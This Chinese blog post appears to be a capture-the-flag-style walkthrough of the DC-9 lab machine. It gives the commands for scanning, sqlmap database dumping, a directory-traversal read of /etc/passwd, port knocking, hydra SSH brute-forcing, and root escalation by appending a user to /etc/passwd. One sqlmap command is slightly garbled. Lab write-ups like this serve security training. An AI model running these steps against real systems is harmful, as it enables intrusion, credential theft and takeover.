DC-9 writeup

最新推荐文章于 2024-10-18 19:00:00 发布
最新推荐文章于 2024-10-18 19:00:00 发布
阅读量346 收藏 3
点赞数 5
文章标签: 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64272648/article/details/141329547
版权

DC-9渗透过程(kali IP:192.168.229.132 靶机IP:192.168.229.157)

**一.信息收集**
nmap -sP 192.168.229.0/24
nmap -sV -p- 192.168.229.157
dirsearch -u 192.168.229.157 -e * -x 403,404
whatweb 192.168.229.157
//22端口不是开放状态 收集信息:语言:PHP 中间件:apache 2.4.38 操作系统:Debian

**二.漏洞查找与利用**
sqlmap -r sqlmap.txt --dbs --batch    //search这个页面很像有sql注入,抓个包来看看发现search参数存在联合查询注入
sqlmap -r sqlmap.txt --tables -D users --batch
sqlmap -r sqlmap.txt --columns -T UserDetails -D users --batch
sqlmap -r sqlmap.txt --dump -C username,password -T UserDetails -D users --batch    //得到一堆用户密码但不能登录进去,再看看另一个数据库
sqlmap -r sqlmap.txt --tables -D Staff --batch
sqlmap -r sqlmap.txt --columns -T Users -D Staff --batch
sqlmap -r sqlmap --dump -T Usersqlmap -D Staff --batch    //得到用户名和加密密码,去网上解密得 用户名:admin 密码:transorbital1,登录进去看看发现就多了一个add record页面,观察发现有File does not exist,想到是程序引用或读取了一个不存在的文件才会回显这个,则有可能可以目录遍历
http://192.168.229.157/manage.php?§ §=../../../../../etc/passwd    //burp抓包,用fuzz里的参数字典爆破出为file,还发现这里的用户和开始sq爆破出来的一样,可能是主机用户的账号密码
http://192.168.229.157/manage.php?file=../../../../../etc/knockd.conf    //前面扫端口发现ssh协议端口不是开放状态,可能是开启了knock服务查看一下有无配置文件,还真有用nc“敲门”
nc -z 192.168.229.157 7469 8475 9842    //敲击完后发现端口打开
hydra -L teat -P teat1 192.168.229.157 ssh    //用匹配的密码不能登进去,尝试把他们当作字典爆破,果然得出三个账号密码,login: chandlerb   password: UrAG0D!    login: joeyt   password: Passw0rd    login: janitor   password: Ilovepeepee

**三.提权**
ssh chandlerb@192.168.229.157
ssh joeyt@192.168.229.157
ssh janitor@192.168.229.157    //远程连接,发现没有可用的suid,sudo也都没有命令
ls -a
cd .secrets-for-putin
cat passwords-found-on-post-it-notes.txt    //在jianitor用户家目录下找到,它隐藏起来了用 ls -a 才能看到,看到里面又有几个密码,添加到刚刚的字典里面,在爆破又得到一个账户密码 login: fredf   password: B4-Tru3-001
ssh fredf@192.168.229.157
sudo -l    //发现/opt/devstuff/dist/test/test可用以root命令执行
cd /opt/devstuff/dist/test    
cat test    //发现是乱码,则可能已经被编译了,在上级目录找找线索
cd ../../
ls
cat test.py
cat test.spec    //发现test脚本执行时要带两个参数,把第一个参数文件追加到第二个参数文件,则可用用这个脚本在/etc/passwd里添加一个root权限用户
cd /tmp
openssl passwd -1 -salt teat 123456    //用openssl命令创建一个密码,openssl passwd -1 -salt <用户名> <密码>
echo 'test:$1$teat$Q2Bt/ufty4kBOZet0211n0:0:0:test:/test:/bin/bash' > test
cd /opt/devstuff/dist/test
sudo ./test /tmp/test /etc/passwd
su test    //得到root权限
find / -name * flag.*
cat /root/theflag.txt

Jay-wings
关注
GKCTF2021-官方WriteUp.pdf
07-06
【标题】:GKCTF2021-官方WriteUp.pdf 【描述】:GKCTF2021-官方WriteUp.pdf 【标签】:wp writeup 这些标题和描述表明,文件是一份关于GKCTF2021(一个网络安全竞赛,CTF代表Capture The Flag)的官方攻略...
D3CTF2022-官方WriteUp1
08-03
9. MySQLInject 攻击 攻击者可以使用 MySQLInject 攻击来攻击 MySQL 数据库。首先,攻击者需要注入恶意的 SQL 语句,然后使用 mybatis 框架来生成恶意的 SQL 语句,以便攻击 MySQL 数据库。 本文对 D3CTF 2022 ...
morpheme-ordering-writeup
03-20
总的来说,"morpheme-ordering-writeup"是一个关于语素排序的研究工作,可能包括理论分析、算法设计、实验验证等多个方面,使用TeX/LaTeX进行排版,通过"morpheme-ordering-writeup-master"的压缩包我们可以获取到...
Prediction-Assignment-Writeup
03-18
9. **代码组织**: "Prediction-Assignment-Writeup-main"可能包含了一个结构化的代码目录,包括数据读取脚本、预处理函数、模型训练代码、结果评估和可视化代码等,体现了良好的编程实践。 10. **报告撰写**: 数据...
Systems-Administration-Writeup
03-17
在“Systems-Administration-Writeup-main”这个文件中,可能会详细讲解这些概念和技巧,包括如何监控系统、管理日志、设置别名以及有效利用VIM进行文本编辑。通过学习这些内容,你可以增强自己的系统管理能力,更好...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8508
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
网数中心举办CISAW安全软件教师培训 助力国家网络安全战略
qq_44969472的博客
10-15 386
他强调,CISAW安全软件人员认证应立足我国软件安全开发的特色,以服务国家网络安全战略布局为核心,通过认证结果不断带动人员能力提升,聚焦行业需求、热点和难点问题,进一步完善创新发展体系。我们相信,随着CISAW认证体系的不断完善和发展,必将为我国信息安全领域输送更多优秀的人才,助力国家信息安全事业迈上新的台阶。这一环节得到了大家的一致好评,许多教师表示,通过实际操作,他们不仅巩固了所学知识,还获得了更多的实战经验。他表示,通过这次培训,大家不仅学到了最新的技术和理念,更重要的是,明确了未来努力的方向。
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
10-15 1215
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
2024年网络安全进阶手册:三个月黑客技术自学路线
2401_85027336的博客
10-12 1205
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
2024年网络安全(黑客技术)三个月自学手册
最新发布
csbDD的博客
10-18 507
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
网络攻击的新趋势:勒索软件与零日漏洞
A526847的博客
10-12 1043
随着数字化技术的飞速发展网络攻击的新趋势:勒索软件与零日漏洞,网络攻击的形式也在不断演变。近年来,勒索软件和零日漏洞已成为网络攻击中的两大新趋势,给个人、企业和政府机构带来了巨大的安全威胁。本文将深入探讨这两种网络攻击手段的特点、危害以及防范措施。
常见的内网渗透思路及方法(包含示例)
xixixi7777的博客
10-11 1167
内网渗透是指在企业或组织的内部网络中进行安全测试,以发现和利用网络中的安全漏洞。
网络安全(黑客)——自学2024
2401_84466325的博客
10-10 2312
网络安全是一种综合性的概念,涵盖了保护计算机系统、网络基础设施和数据免受未经授权的访问、攻击、损害或盗窃的一系列措施和技术。经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
网络安全知识核心20要点
2401_84466227的博客
10-16 747
攻击者在 HTTP 请求中注入恶意的 SQL 代码,服务器使用参数构建数据库 SQL 命令时,恶意SQL 被一起构造,并在数据库中执行。
网络安全(黑客技术)2024年三个月自学手册
2401_85026116的博客
10-13 1388
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
网络安全】IDOR与JWT令牌破解相结合,实现编辑、查看和删除数万帐户
等风来
10-15 223
某公共漏洞奖励计划的应用程序API中存在两个关键漏洞,这些漏洞严重危及用户数据和账户安全。第一个漏洞允许通过未受保护的API端点获取未经授权的用户敏感数据,第二个漏洞则利用了弱加密的JSON Web Token(JWT)密钥,使攻击者能够冒充用户执行敏感操作。
oscp 2023 challenge writeup-medtech-csdn博客
10-29
OSCP 2023 Challenge Writeup-MedTech-CSDN博客是一个关于OSCP挑战赛的技术解析博客。在这篇博客中,作者详细讲解了一个名为MedTech的挑战项目,并提供了解决该挑战所需的步骤和工具。 这篇博客的开头介绍了OSCP...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值